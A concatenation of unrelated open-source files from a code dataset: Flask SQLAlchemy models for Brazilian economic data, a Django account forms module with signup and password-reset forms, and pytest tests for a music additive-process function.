            name = "population_{0}".format(latest_year)
        else:
            group = "{0}_stats_{1}".format(dataset,latest_year)
            if calc_var:
                name = calc_var
            else:
                name = "total_{0}".format(val_var)
        return {"name": name, "value": val, "group": group}
class Isic(db.Model, AutoSerialize, Stats):
__tablename__ = 'attrs_isic'
id = db.Column(db.String(5), primary_key=True)
name_en = db.Column(db.String(200))
name_pt = db.Column(db.String(200))
desc_en = db.Column(db.Text())
desc_pt = db.Column(db.Text())
keywords_en = db.Column(db.String(100))
keywords_pt = db.Column(db.String(100))
color = db.Column(db.String(7))
gender_pt = db.Column(db.String(1))
plural_pt = db.Column(db.Boolean())
article_pt = db.Column(db.Boolean())
yi = db.relationship("Yi", backref = 'isic', lazy = 'dynamic')
ybi = db.relationship("Ybi", backref = 'isic', lazy = 'dynamic')
yio = db.relationship("Yio", backref = 'isic', lazy = 'dynamic')
ybio = db.relationship("Ybio", backref = 'isic', lazy = 'dynamic')
def name(self):
lang = getattr(g, "locale", "en")
return title_case(getattr(self,"name_"+lang))
def icon(self):
return "/static/img/icons/isic/isic_%s.png" % (self.id[:1])
def __repr__(self):
return '<Isic %r>' % (self.name_en)
class Cbo(db.Model, AutoSerialize, Stats):
    """Occupation classification (CBO) attribute, backed by attrs_cbo."""

    __tablename__ = 'attrs_cbo'
    id = db.Column(db.String(6), primary_key=True)
    # Bilingual display names and descriptions (en = English, pt = Portuguese).
    name_en = db.Column(db.String(200))
    name_pt = db.Column(db.String(200))
    desc_en = db.Column(db.Text())
    desc_pt = db.Column(db.Text())
    keywords_en = db.Column(db.String(100))
    keywords_pt = db.Column(db.String(100))
    color = db.Column(db.String(7))
    # Portuguese grammar metadata used when composing sentences.
    gender_pt = db.Column(db.String(1))
    plural_pt = db.Column(db.Boolean())
    article_pt = db.Column(db.Boolean())

    # RAIS aggregate tables keyed (in part) by this occupation.
    yo = db.relationship("Yo", backref = 'cbo', lazy = 'dynamic')
    ybo = db.relationship("Ybo", backref = 'cbo', lazy = 'dynamic')
    yio = db.relationship("Yio", backref = 'cbo', lazy = 'dynamic')
    ybio = db.relationship("Ybio", backref = 'cbo', lazy = 'dynamic')

    def name(self):
        """Return the title-cased name in the request's locale (default en)."""
        lang = getattr(g, "locale", "en")
        return title_case(getattr(self,"name_"+lang))

    def icon(self):
        # Icons are keyed by the top-level (1-char) group of the id.
        return "/static/img/icons/cbo/cbo_%s.png" % (self.id[:1])

    def __repr__(self):
        return '<Cbo %r>' % (self.name_en)
class Hs(db.Model, AutoSerialize, Stats):
    """Product classification (HS) attribute, backed by attrs_hs."""

    __tablename__ = 'attrs_hs'
    id = db.Column(db.String(8), primary_key=True)
    # Bilingual display names and descriptions (en = English, pt = Portuguese).
    name_en = db.Column(db.String(200))
    name_pt = db.Column(db.String(200))
    desc_en = db.Column(db.Text())
    desc_pt = db.Column(db.Text())
    keywords_en = db.Column(db.String(100))
    keywords_pt = db.Column(db.String(100))
    color = db.Column(db.String(7))
    # Portuguese grammar metadata used when composing sentences.
    gender_pt = db.Column(db.String(1))
    plural_pt = db.Column(db.Boolean())
    article_pt = db.Column(db.Boolean())

    # SECEX aggregate tables keyed (in part) by this product.
    yp = db.relationship("Yp", backref = 'hs', lazy = 'dynamic')
    ypw = db.relationship("Ypw", backref = 'hs', lazy = 'dynamic')
    ybp = db.relationship("Ybp", backref = 'hs', lazy = 'dynamic')
    ybpw = db.relationship("Ybpw", backref = 'hs', lazy = 'dynamic')

    def name(self):
        """Return the title-cased name in the request's locale (default en)."""
        lang = getattr(g, "locale", "en")
        return title_case(getattr(self,"name_"+lang))

    def icon(self):
        # Icons are keyed by the 2-char HS chapter prefix of the id.
        return "/static/img/icons/hs/hs_%s.png" % (self.id[:2])

    def __repr__(self):
        return '<Hs %r>' % (self.name_en)
############################################################
# ----------------------------------------------------------
# Geography
#
############################################################
class Wld(db.Model, AutoSerialize, Stats):
    """World country attribute, backed by attrs_wld."""

    __tablename__ = 'attrs_wld'
    id = db.Column(db.String(5), primary_key=True)
    # Alternate country codings (2/3-char ISO-style, numeric, MDIC).
    id_2char = db.Column(db.String(2))
    id_3char = db.Column(db.String(3))
    id_num = db.Column(db.Integer(11))
    id_mdic = db.Column(db.Integer(11))
    name_en = db.Column(db.String(200))
    name_pt = db.Column(db.String(200))
    color = db.Column(db.String(7))
    # Portuguese grammar metadata used when composing sentences.
    gender_pt = db.Column(db.String(1))
    plural_pt = db.Column(db.Boolean())
    article_pt = db.Column(db.Boolean())

    # SECEX aggregate tables keyed (in part) by this country.
    yw = db.relationship("Yw", backref = 'wld', lazy = 'dynamic')
    ypw = db.relationship("Ypw", backref = 'wld', lazy = 'dynamic')
    ybw = db.relationship("Ybw", backref = 'wld', lazy = 'dynamic')
    ybpw = db.relationship("Ybpw", backref = 'wld', lazy = 'dynamic')

    def name(self):
        """Return the title-cased name in the request's locale (default en)."""
        lang = getattr(g, "locale", "en")
        return title_case(getattr(self,"name_"+lang))

    def icon(self):
        if self.id == "all":
            # "all" gets a dedicated catch-all icon.
            return "/static/img/icons/wld/wld_sabra.png"
        else:
            return "/static/img/icons/wld/wld_%s.png" % (self.id)

    def __repr__(self):
        return '<Wld %r>' % (self.id_3char)
# Self-referential many-to-many association table on attrs_bra, linking
# geographies (bra_id) to their planning regions (pr_id).
bra_pr = db.Table('attrs_bra_pr',
    db.Column('bra_id', db.Integer, db.ForeignKey('attrs_bra.id')),
    db.Column('pr_id', db.Integer, db.ForeignKey('attrs_bra.id'))
)
class Bra(db.Model, AutoSerialize, Stats):
    """Brazilian geography attribute (state/meso/micro/municipality),
    backed by attrs_bra."""

    __tablename__ = 'attrs_bra'
    id = db.Column(db.String(10), primary_key=True)
    id_ibge = db.Column(db.Integer(7))
    name_en = db.Column(db.String(200))
    name_pt = db.Column(db.String(200))
    color = db.Column(db.String(7))
    # Portuguese grammar metadata used when composing sentences.
    gender_pt = db.Column(db.String(1))
    plural_pt = db.Column(db.Boolean())
    article_pt = db.Column(db.Boolean())
    # Class-level default, not a DB column; presumably overwritten per
    # instance when distances are attached — TODO confirm with callers.
    distance = 0

    # SECEX relations
    yb_secex = db.relationship("Yb_secex", backref = 'bra', lazy = 'dynamic')
    ybp = db.relationship("Ybp", backref = 'bra', lazy = 'dynamic')
    ybw = db.relationship("Ybw", backref = 'bra', lazy = 'dynamic')
    ybpw = db.relationship("Ybpw", backref = 'bra', lazy = 'dynamic')

    # RAIS relations
    yb_rais = db.relationship("Yb_rais", backref = 'bra', lazy = 'dynamic')
    ybi = db.relationship("Ybi", backref = 'bra', lazy = 'dynamic')
    ybo = db.relationship("Ybo", backref = 'bra', lazy = 'dynamic')
    ybio = db.relationship("Ybio", backref = 'bra', lazy = 'dynamic')

    # Neighbors: Distances rows where this Bra is the origin (neighbors)
    # or the destination (bb).
    neighbors = db.relationship('Distances', primaryjoin = "(Bra.id == Distances.bra_id_origin)", backref='bra_origin', lazy='dynamic')
    bb = db.relationship('Distances', primaryjoin = "(Bra.id == Distances.bra_id_dest)", backref='bra', lazy='dynamic')

    # Planning Regions: self-referential many-to-many through bra_pr,
    # mapped in both directions (pr / pr2).
    pr = db.relationship('Bra',
        secondary = bra_pr,
        primaryjoin = (bra_pr.c.pr_id == id),
        secondaryjoin = (bra_pr.c.bra_id == id),
        backref = db.backref('bra', lazy = 'dynamic'),
        lazy = 'dynamic')
    pr2 = db.relationship('Bra',
        secondary = bra_pr,
        primaryjoin = (bra_pr.c.bra_id == id),
        secondaryjoin = (bra_pr.c.pr_id == id),
        backref = db.backref('bra2', lazy = 'dynamic'),
        lazy = 'dynamic')

    def name(self):
        """Return the title-cased name in the request's locale (default en)."""
        lang = getattr(g, "locale", "en")
        return title_case(getattr(self,"name_"+lang))

    def icon(self):
        # Icons are keyed by the 2-char state prefix of the id.
        return "/static/img/icons/bra/bra_%s.png" % (self.id[:2])

    def get_neighbors(self, dist, remove_self=False):
        """Return Distances rows within *dist* of this Bra, nearest first.

        With remove_self=True the zero-distance row for this Bra itself is
        excluded.
        """
        q = self.neighbors.filter(Distances.distance <= dist).order_by(Distances.distance)
        if remove_self:
            q = q.filter(Distances.bra_id_dest != self.id) # filter out self
        return q.all()

    def __repr__(self):
        return '<Bra %r>' % (self.name_en)
############################################################
# ----------------------------------------------------------
# Attr data
#
############################################################
class Distances(db.Model):
    """Pairwise distance between two geographies, backed by attrs_bb."""

    __tablename__ = 'attrs_bb'
    bra_id_origin = db.Column(db.String(10), db.ForeignKey(Bra.id), primary_key=True)
    bra_id_dest = db.Column(db.String(10), db.ForeignKey(Bra.id), primary_key=True)
    distance = db.Column(db.Float())

    def __repr__(self):
        return '<Bra_Dist %r-%r:%g>' % (self.bra_id_origin, self.bra_id_dest, self.distance)

    def serialize(self):
        """Return a plain-dict representation for JSON responses."""
        return {
            "bra_id_origin": self.bra_id_origin,
            "bra_id_dest": self.bra_id_dest,
            "distance": self.distance
        }
class Yb(db.Model, AutoSerialize):
    """Yearly population per geography, backed by attrs_yb."""

    __tablename__ = 'attrs_yb'
    year = db.Column(db.Integer(4), primary_key=True)
    bra_id = db.Column(db.String(10), db.ForeignKey(Bra.id), primary_key=True)
    population = db.Column(db.Integer)

    def __repr__(self):
        return '<Yb %r.%r>' % (self.year, self.bra_id)
| 43.743041 | 159 | 0.561044 |
795af2e34e7d98ae61c1386f18c65ddb15a4ae38 | 60 | py | Python | creten/orders/TradeCloseType.py | nardew/Creten | 15ddb0b52e6f2afec2c79b3c731fccb34a2c63d6 | [
"MIT"
] | 9 | 2019-12-17T10:42:40.000Z | 2021-12-02T23:07:05.000Z | creten/orders/TradeCloseType.py | nardew/Creten | 15ddb0b52e6f2afec2c79b3c731fccb34a2c63d6 | [
"MIT"
] | null | null | null | creten/orders/TradeCloseType.py | nardew/Creten | 15ddb0b52e6f2afec2c79b3c731fccb34a2c63d6 | [
"MIT"
] | 6 | 2019-03-04T15:01:10.000Z | 2022-01-12T23:22:55.000Z | class TradeCloseType:
ORDER_DRIVEN = 1
QUANTITY_DRIVEN = 2 | 20 | 21 | 0.8 |
795af3e60ab8ebc185a973681d7192a653d6c427 | 16,596 | py | Python | webapp/apps/account/forms.py | zhiwehu/IBookmark | b416f14f2b7ede4f38a00f386c2cdac01cbd740f | [
"Apache-2.0"
] | 1 | 2020-04-01T11:11:37.000Z | 2020-04-01T11:11:37.000Z | webapp/apps/account/forms.py | zhiwehu/IBookmark | b416f14f2b7ede4f38a00f386c2cdac01cbd740f | [
"Apache-2.0"
] | null | null | null | webapp/apps/account/forms.py | zhiwehu/IBookmark | b416f14f2b7ede4f38a00f386c2cdac01cbd740f | [
"Apache-2.0"
] | 2 | 2019-10-04T06:00:32.000Z | 2021-02-03T08:08:27.000Z | import re
from django import forms
from django.conf import settings
from django.core.mail import send_mail
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _, ugettext
from django.utils.http import int_to_base36
from django.contrib import messages
from django.contrib.auth import authenticate
from django.contrib.auth.models import User
from django.contrib.auth.tokens import default_token_generator
from django.contrib.sites.models import Site
from emailconfirmation.models import EmailAddress
from timezones.forms import TimeZoneField
from models import Account, PasswordReset
from utils import perform_login, change_password
alnum_re = re.compile(r"^\w+$")
# @@@ might want to find way to prevent settings access globally here.
REQUIRED_EMAIL = getattr(settings, "ACCOUNT_REQUIRED_EMAIL", False)
EMAIL_VERIFICATION = getattr(settings, "ACCOUNT_EMAIL_VERIFICATION", False)
EMAIL_AUTHENTICATION = getattr(settings, "ACCOUNT_EMAIL_AUTHENTICATION", False)
UNIQUE_EMAIL = getattr(settings, "ACCOUNT_UNIQUE_EMAIL", False)
PASSWORD_MIN_LENGTH=6
PASSWORD_MAX_LENGTH=20
class GroupForm(forms.Form):
    """Base form that accepts an optional ``group`` keyword argument and
    stores it on the instance before normal Form initialization."""

    def __init__(self, *args, **kwargs):
        # Pop 'group' so Django's Form.__init__ never sees it.
        self.group = kwargs.pop("group", None)
        super(GroupForm, self).__init__(*args, **kwargs)
class LoginForm(GroupForm):
    """Login form whose identifier field (email vs. username) is chosen at
    runtime from the ACCOUNT_EMAIL_AUTHENTICATION setting."""

    password = forms.CharField(
        label=_("Password"),
        widget=forms.PasswordInput(render_value=False)
    )
    remember = forms.BooleanField(
        label=_("Remember Me"),
        help_text=_("If checked you will stay logged in for 3 weeks"),
        required=False
    )

    # Set by clean() on successful authentication; consumed by login().
    user = None

    def __init__(self, *args, **kwargs):
        super(LoginForm, self).__init__(*args, **kwargs)
        ordering = []
        # Add either an email or a username field depending on settings.
        if EMAIL_AUTHENTICATION:
            self.fields["email"] = forms.EmailField(
                label=ugettext("Email"),
            )
            ordering.append("email")
        else:
            self.fields["username"] = forms.CharField(
                label=ugettext("Username"),
                max_length=30,
            )
            ordering.append("username")
        ordering.extend(["password", "remember"])
        self.fields.keyOrder = ordering

    def user_credentials(self):
        """
        Provides the credentials required to authenticate the user for
        login.
        """
        credentials = {}
        if EMAIL_AUTHENTICATION:
            credentials["email"] = self.cleaned_data["email"]
        else:
            credentials["username"] = self.cleaned_data["username"]
        credentials["password"] = self.cleaned_data["password"]
        return credentials

    def clean(self):
        """Authenticate the credentials; store the user or raise a form error."""
        if self._errors:
            return
        user = authenticate(**self.user_credentials())
        if user:
            if user.is_active:
                self.user = user
            else:
                raise forms.ValidationError(_("This account is currently inactive."))
        else:
            if EMAIL_AUTHENTICATION:
                error = _("The email address and/or password you specified are not correct.")
            else:
                error = _("The username and/or password you specified are not correct.")
            raise forms.ValidationError(error)
        return self.cleaned_data

    def login(self, request):
        """Log the authenticated user in; 'remember' extends the session to
        three weeks, otherwise it expires when the browser closes."""
        perform_login(request, self.user)
        if self.cleaned_data["remember"]:
            request.session.set_expiry(60 * 60 * 24 * 7 * 3)
        else:
            request.session.set_expiry(0)
class SignupForm(GroupForm):
username = forms.CharField(
label=_("Username"),
max_length=30,
widget=forms.TextInput()
)
password1 = forms.CharField(
label=_("Password"),
widget=forms.PasswordInput(render_value=False)
)
password2 = forms.CharField(
label=_("Password (again)"),
widget=forms.PasswordInput(render_value=False)
)
email = forms.EmailField(widget=forms.TextInput())
confirmation_key = forms.CharField(
max_length=40,
required=False,
widget=forms.HiddenInput()
)
def __init__(self, *args, **kwargs):
super(SignupForm, self).__init__(*args, **kwargs)
if REQUIRED_EMAIL or EMAIL_VERIFICATION or EMAIL_AUTHENTICATION:
self.fields["email"].label = ugettext("Email")
self.fields["email"].required = True
else:
self.fields["email"].label = ugettext("Email (optional)")
self.fields["email"].required = False
def clean_username(self):
if not alnum_re.search(self.cleaned_data["username"]):
raise forms.ValidationError(_("Usernames can only contain letters, numbers and underscores."))
try:
User.objects.get(username__iexact=self.cleaned_data["username"])
except User.DoesNotExist:
return self.cleaned_data["username"]
raise forms.ValidationError(_("This username is already taken. Please choose another."))
def clean_email(self):
value = self.cleaned_data["email"]
if UNIQUE_EMAIL or EMAIL_AUTHENTICATION:
try:
User.objects.get(email__iexact=value)
except User.DoesNotExist:
return value
raise forms.ValidationError(_("A user is registered with this email address."))
return value
def clean(self):
if "password1" in self.cleaned_data and "password2" in self.cleaned_data:
if len(self.cleaned_data["password1"]) < PASSWORD_MIN_LENGTH or len(self.cleaned_data["password1"]) > PASSWORD_MAX_LENGTH:
raise forms.ValidationError(_("Password should be in %(min)d to %(max)d" % {"min": PASSWORD_MIN_LENGTH, "max":PASSWORD_MAX_LENGTH}))
if len(self.cleaned_data["password2"]) < PASSWORD_MIN_LENGTH or len(self.cleaned_data["password2"]) > PASSWORD_MAX_LENGTH:
raise forms.ValidationError(_("Password should be in %(min)d to %(max)d" % {"min": PASSWORD_MIN_LENGTH, "max":PASSWORD_MAX_LENGTH}))
if self.cleaned_data["password1"] != self.cleaned_data["password2"]:
raise forms.ValidationError(_("You must type the same password each time."))
return self.cleaned_data
def create_user(self, username=None, commit=True):
user = User()
if username is None:
raise NotImplementedError("SignupForm.create_user does not handle "
"username=None case. You must override this method.")
user.username = username
user.email = self.cleaned_data["email"].strip().lower()
password = self.cleaned_data.get("password1")
if password:
user.set_password(password)
else:
user.set_unusable_password()
if commit:
user.save()
return user
def login(self, request, user):
# nasty hack to get get_user to work in Django
user.backend = "django.contrib.auth.backends.ModelBackend"
perform_login(request, user)
def save(self, request=None):
    """Create the new user, honouring an optional JoinInvitation key.

    Three paths:
      * invitation key matches and the invited address equals the signup
        address -> the address is verified by construction;
      * invitation key matches but a different address was entered -> send
        a confirmation email for the new address;
      * no (valid) key -> plain signup with optional confirmation email.
    When EMAIL_VERIFICATION is on the account is deactivated until the
    address is confirmed.  Returns the created ``User``.
    """
    # don't assume a username is available. it is a common removal if
    # site developer wants to use email authentication.
    username = self.cleaned_data.get("username")
    email = self.cleaned_data["email"]
    if self.cleaned_data["confirmation_key"]:
        from friends.models import JoinInvitation  # @@@ temporary fix for issue 93
        try:
            join_invitation = JoinInvitation.objects.get(confirmation_key=self.cleaned_data["confirmation_key"])
            confirmed = True
        except JoinInvitation.DoesNotExist:
            confirmed = False
    else:
        confirmed = False
    # @@@ clean up some of the repetition below -- DRY!
    if confirmed:
        if email == join_invitation.contact.email:
            # Invited address == signup address: no confirmation round-trip.
            new_user = self.create_user(username)
            join_invitation.accept(new_user)  # should go before creation of EmailAddress below
            if request:
                messages.add_message(request, messages.INFO,
                    ugettext(u"Your email address has already been verified")
                )
            # already verified so can just create
            EmailAddress(user=new_user, email=email, verified=True, primary=True).save()
        else:
            # Invitation accepted with a different address: that address is
            # unverified and must go through the confirmation flow.
            new_user = self.create_user(username)
            join_invitation.accept(new_user)  # should go before creation of EmailAddress below
            if email:
                if request:
                    messages.add_message(request, messages.INFO,
                        ugettext(u"Confirmation email sent to %(email)s") % {
                            "email": email,
                        }
                    )
                EmailAddress.objects.add_email(new_user, email)
    else:
        # Plain signup: queue the confirmation email for the address, only
        # flashing a message when verification is not mandatory.
        new_user = self.create_user(username)
        if email:
            if request and not EMAIL_VERIFICATION:
                messages.add_message(request, messages.INFO,
                    ugettext(u"Confirmation email sent to %(email)s") % {
                        "email": email,
                    }
                )
            EmailAddress.objects.add_email(new_user, email)
    if EMAIL_VERIFICATION:
        # Account stays inactive until the email address is confirmed.
        new_user.is_active = False
        new_user.save()
    self.after_signup(new_user)
    return new_user
def after_signup(self, user, **kwargs):
    """Hook called with the freshly created user once signup completes.

    An extension point for subclasses; the base implementation does nothing.
    """
class UserForm(forms.Form):
    """Base form that carries the acting ``user`` alongside the form data."""

    def __init__(self, user=None, *args, **kwargs):
        super(UserForm, self).__init__(*args, **kwargs)
        # Kept on the instance so field-level clean methods can consult it.
        self.user = user
class AccountForm(UserForm):
    """UserForm variant that also resolves the user's ``Account`` record.

    If no Account row exists yet, an *unsaved* Account instance is attached
    so subclasses can read defaults and save it later.
    """

    def __init__(self, *args, **kwargs):
        super(AccountForm, self).__init__(*args, **kwargs)
        try:
            self.account = Account.objects.get(user=self.user)
        except Account.DoesNotExist:
            # No persisted account yet: work against a fresh, unsaved one.
            self.account = Account(user=self.user)
class AddEmailForm(UserForm):
    """Attach an additional email address to the acting user's account."""

    email = forms.EmailField(
        label=_("Email"),
        required=True,
        widget=forms.TextInput(attrs={"size": "30"}),
    )

    def clean_email(self):
        """Reject addresses already attached to this or another account."""
        value = self.cleaned_data["email"]
        errors = {
            "this_account": _("This email address already associated with this account."),
            "different_account": _("This email address already associated with another account."),
        }
        if UNIQUE_EMAIL:
            # Globally unique addresses: a single lookup decides ownership.
            try:
                existing = EmailAddress.objects.get(email__iexact=value)
            except EmailAddress.DoesNotExist:
                return value
            key = "this_account" if existing.user == self.user else "different_account"
            raise forms.ValidationError(errors[key])
        # Non-unique mode: only duplicates within this account are rejected.
        try:
            EmailAddress.objects.get(user=self.user, email__iexact=value)
        except EmailAddress.DoesNotExist:
            return value
        raise forms.ValidationError(errors["this_account"])

    def save(self):
        """Create the EmailAddress (and kick off its confirmation flow)."""
        return EmailAddress.objects.add_email(self.user, self.cleaned_data["email"])
class ChangePasswordForm(UserForm):
    """Change the password of an already-authenticated user."""

    oldpassword = forms.CharField(
        label=_("Current Password"),
        widget=forms.PasswordInput(render_value=False),
    )
    password1 = forms.CharField(
        label=_("New Password"),
        widget=forms.PasswordInput(render_value=False),
    )
    password2 = forms.CharField(
        label=_("New Password (again)"),
        widget=forms.PasswordInput(render_value=False),
    )

    def clean_oldpassword(self):
        # The user must prove knowledge of the current password first.
        if not self.user.check_password(self.cleaned_data.get("oldpassword")):
            raise forms.ValidationError(_("Please type your current password."))
        return self.cleaned_data["oldpassword"]

    def clean_password2(self):
        data = self.cleaned_data
        if "password1" in data and "password2" in data and data["password1"] != data["password2"]:
            raise forms.ValidationError(_("You must type the same password each time."))
        return data["password2"]

    def save(self):
        change_password(self.user, self.cleaned_data["password1"])
class SetPasswordForm(UserForm):
    """Set a password for a user who has none (or an unusable one)."""

    password1 = forms.CharField(
        label=_("Password"),
        widget=forms.PasswordInput(render_value=False),
    )
    password2 = forms.CharField(
        label=_("Password (again)"),
        widget=forms.PasswordInput(render_value=False),
    )

    def clean_password2(self):
        data = self.cleaned_data
        if "password1" in data and "password2" in data and data["password1"] != data["password2"]:
            raise forms.ValidationError(_("You must type the same password each time."))
        return data["password2"]

    def save(self):
        self.user.set_password(self.cleaned_data["password1"])
        self.user.save()
class ResetPasswordForm(forms.Form):
    """Request a password-reset email for a verified address."""

    email = forms.EmailField(
        label=_("Email"),
        required=True,
        widget=forms.TextInput(attrs={"size": "30"}),
    )

    def clean_email(self):
        value = self.cleaned_data["email"]
        # Only addresses that completed verification may trigger a reset.
        if EmailAddress.objects.filter(email__iexact=value, verified=True).count() == 0:
            raise forms.ValidationError(_("Email address not verified for any user account"))
        return value

    def save(self, **kwargs):
        """Issue a reset token and mail it to every user with this address."""
        email = self.cleaned_data["email"]
        token_generator = kwargs.get("token_generator", default_token_generator)
        for user in User.objects.filter(email__iexact=email):
            temp_key = token_generator.make_token(user)
            # Record the outstanding reset so the key can be validated later.
            PasswordReset(user=user, temp_key=temp_key).save()
            current_site = Site.objects.get_current()
            domain = unicode(current_site.domain)
            # Render and send the password reset email.
            subject = _("Password reset email sent")
            message = render_to_string("account/password_reset_key_message.txt", {
                "user": user,
                "uid": int_to_base36(user.id),
                "temp_key": temp_key,
                "domain": domain,
            })
            send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, [user.email])
        return self.cleaned_data["email"]
class ResetPasswordKeyForm(forms.Form):
    """Second step of a reset: set the new password using a temp key."""

    password1 = forms.CharField(
        label=_("New Password"),
        widget=forms.PasswordInput(render_value=False),
    )
    password2 = forms.CharField(
        label=_("New Password (again)"),
        widget=forms.PasswordInput(render_value=False),
    )

    def __init__(self, *args, **kwargs):
        # The view resolves both the target user and the reset key.
        self.user = kwargs.pop("user", None)
        self.temp_key = kwargs.pop("temp_key", None)
        super(ResetPasswordKeyForm, self).__init__(*args, **kwargs)

    def clean_password2(self):
        data = self.cleaned_data
        if "password1" in data and "password2" in data and data["password1"] != data["password2"]:
            raise forms.ValidationError(_("You must type the same password each time."))
        return data["password2"]

    def save(self):
        # set the new user password
        self.user.set_password(self.cleaned_data["password1"])
        self.user.save()
        # mark password reset object as reset
        PasswordReset.objects.filter(temp_key=self.temp_key).update(reset=True)
class ChangeTimezoneForm(AccountForm):
    """Edit the timezone stored on the user's Account."""

    timezone = TimeZoneField(label=_("Timezone"), required=True)

    def __init__(self, *args, **kwargs):
        super(ChangeTimezoneForm, self).__init__(*args, **kwargs)
        # Seed the field with the account's current setting.
        self.initial["timezone"] = self.account.timezone

    def save(self):
        self.account.timezone = self.cleaned_data["timezone"]
        self.account.save()
class ChangeLanguageForm(AccountForm):
    """Edit the UI language stored on the user's Account."""

    language = forms.ChoiceField(
        label=_("Language"),
        required=True,
        choices=settings.LANGUAGES,
    )

    def __init__(self, *args, **kwargs):
        super(ChangeLanguageForm, self).__init__(*args, **kwargs)
        # Seed the field with the account's current setting.
        self.initial["language"] = self.account.language

    def save(self):
        self.account.language = self.cleaned_data["language"]
        self.account.save()
| 37.044643 | 148 | 0.62509 |
795af4d864995ffc8fae39868fb4eb2dfaeab3d0 | 332 | py | Python | colcon_export_command/xml/models/__init__.py | maciejmatuszak/colcon-export-command | a7747996cbff25d8611306a9c1987cea3966271e | [
"Apache-2.0"
] | null | null | null | colcon_export_command/xml/models/__init__.py | maciejmatuszak/colcon-export-command | a7747996cbff25d8611306a9c1987cea3966271e | [
"Apache-2.0"
] | null | null | null | colcon_export_command/xml/models/__init__.py | maciejmatuszak/colcon-export-command | a7747996cbff25d8611306a9c1987cea3966271e | [
"Apache-2.0"
] | null | null | null | from colcon_export_command.xml.models.project import (
AdditionalGenerationEnvironment,
Component,
Configuration,
Configurations,
Env,
Envs,
Project,
)
__all__ = [
"AdditionalGenerationEnvironment",
"Component",
"Configuration",
"Configurations",
"Env",
"Envs",
"Project",
]
| 16.6 | 54 | 0.650602 |
795af779c8632aff242bcdccdb44123e7a86ed56 | 14,133 | py | Python | tests/test_minimalism.py | georgesdimitrov/arvo | 86d33afc3f45d1f2e6f22aded8c2e2b12bc5db7d | [
"MIT"
] | 11 | 2021-02-24T20:05:24.000Z | 2022-03-13T14:27:04.000Z | tests/test_minimalism.py | georgesdimitrov/arvo | 86d33afc3f45d1f2e6f22aded8c2e2b12bc5db7d | [
"MIT"
] | null | null | null | tests/test_minimalism.py | georgesdimitrov/arvo | 86d33afc3f45d1f2e6f22aded8c2e2b12bc5db7d | [
"MIT"
] | 3 | 2021-09-24T02:26:16.000Z | 2022-03-22T12:34:36.000Z | import pytest
from music21 import converter
from arvo import minimalism
from arvo import sequences
@pytest.fixture
def example_stream():
    """A two-octave C-major scale as a music21 stream (12 quarter notes)."""
    s = converter.parse("tinyNotation: C D E F G A B c d e f g")
    return s
# Additive Process Tests
def test_additive_process(example_stream):
    """Default additive process: each iteration reveals one more note
    from the start of the source stream."""
    result = minimalism.additive_process(example_stream)
    intended_result = converter.parse(
        """tinyNotation:
        C
        C D
        C D E
        C D E F
        C D E F G
        C D E F G A
        C D E F G A B
        C D E F G A B c
        C D E F G A B c d
        C D E F G A B c d e
        C D E F G A B c d e f
        C D E F G A B c d e f g
        """
    )
    # Compare the flattened note sequences; offsets/durations follow from parsing.
    assert list(result.flat.notes) == list(intended_result.flat.notes)
@pytest.mark.parametrize(
"direction,intended_result",
[
(
minimalism.Direction.BACKWARD,
converter.parse(
"""tinyNotation:
g
f g
e f g
d e f g
c d e f g
B c d e f g
A B c d e f g
G A B c d e f g
F G A B c d e f g
E F G A B c d e f g
D E F G A B c d e f g
C D E F G A B c d e f g
"""
),
),
(
minimalism.Direction.INWARD,
converter.parse(
"""tinyNotation:
C g
C D f g
C D E e f g
C D E F d e f g
C D E F G c d e f g
C D E F G A B c d e f g
"""
),
),
(
minimalism.Direction.OUTWARD,
converter.parse(
"""tinyNotation:
A B
G A B c
F G A B c d
E F G A B c d e
D E F G A B c d e f
C D E F G A B c d e f g
"""
),
),
],
)
def test_additive_process_direction(example_stream, direction, intended_result):
result = minimalism.additive_process(example_stream, direction=direction)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_step_value_int(example_stream):
result = minimalism.additive_process(example_stream, step_value=2)
intended_result = converter.parse(
"""tinyNotation:
C D
C D E F
C D E F G A
C D E F G A B c
C D E F G A B c d e
C D E F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_step_value_sequence(example_stream):
result = minimalism.additive_process(example_stream, step_value=[1, 2, 3])
intended_result = converter.parse(
"""tinyNotation:
C
C D E
C D E F G A
C D E F G A B
C D E F G A B c d
C D E F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_step_value_sequence_absolute(example_stream):
result = minimalism.additive_process(
example_stream,
step_value=sequences.PRIMES,
step_mode=minimalism.StepMode.ABSOLUTE,
)
intended_result = converter.parse(
"""tinyNotation:
C D
C D E
C D E F G
C D E F G A B
C D E F G A B c d e f
C D E F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_step_value_sequence_absolute_infinite_loop(example_stream):
result = minimalism.additive_process(
example_stream, step_value=[1, 2, 3], step_mode=minimalism.StepMode.ABSOLUTE
)
intended_result = converter.parse(
"""tinyNotation:
C
C D
C D E
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_repetitions_int(example_stream):
result = minimalism.additive_process(example_stream, repetitions=2)
intended_result = converter.parse(
"""tinyNotation:
C
C
C D
C D
C D E
C D E
C D E F
C D E F
C D E F G
C D E F G
C D E F G A
C D E F G A
C D E F G A B
C D E F G A B
C D E F G A B c
C D E F G A B c
C D E F G A B c d
C D E F G A B c d
C D E F G A B c d e
C D E F G A B c d e
C D E F G A B c d e f
C D E F G A B c d e f
C D E F G A B c d e f g
C D E F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_repetitions_sequence(example_stream):
result = minimalism.additive_process(example_stream, repetitions=[1, 2, 3])
intended_result = converter.parse(
"""tinyNotation:
C
C D
C D
C D E
C D E
C D E
C D E F
C D E F G
C D E F G
C D E F G A
C D E F G A
C D E F G A
C D E F G A B
C D E F G A B c
C D E F G A B c
C D E F G A B c d
C D E F G A B c d
C D E F G A B c d
C D E F G A B c d e
C D E F G A B c d e f
C D E F G A B c d e f
C D E F G A B c d e f g
C D E F G A B c d e f g
C D E F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_iterations_start(example_stream):
result = minimalism.additive_process(example_stream, iterations_start=3)
intended_result = converter.parse(
"""tinyNotation:
C D E
C D E F
C D E F G
C D E F G A
C D E F G A B
C D E F G A B c
C D E F G A B c d
